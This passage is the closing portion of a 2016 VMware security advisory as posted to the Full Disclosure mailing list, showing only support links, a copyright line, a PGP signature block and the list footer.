   https://www.vmware.com/support/policies/lifecycle.html
   Twitter
   https://twitter.com/VMwareSRC

   Copyright 2016 VMware Inc.  All rights reserved.
-BEGIN PGP SIGNATURE-
Comment: GPGTools - https://gpgtools.org

iEYEARECAAYFAlet4asACgkQDEcm8Vbi9kPVKACgnlsjsXyC+F6mjAMPDlnlpvRa
JxoAn1RGp6fgcwKnr5XabptCxIQb5jtP
=VkpN
-END PGP SIGNATURE-


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/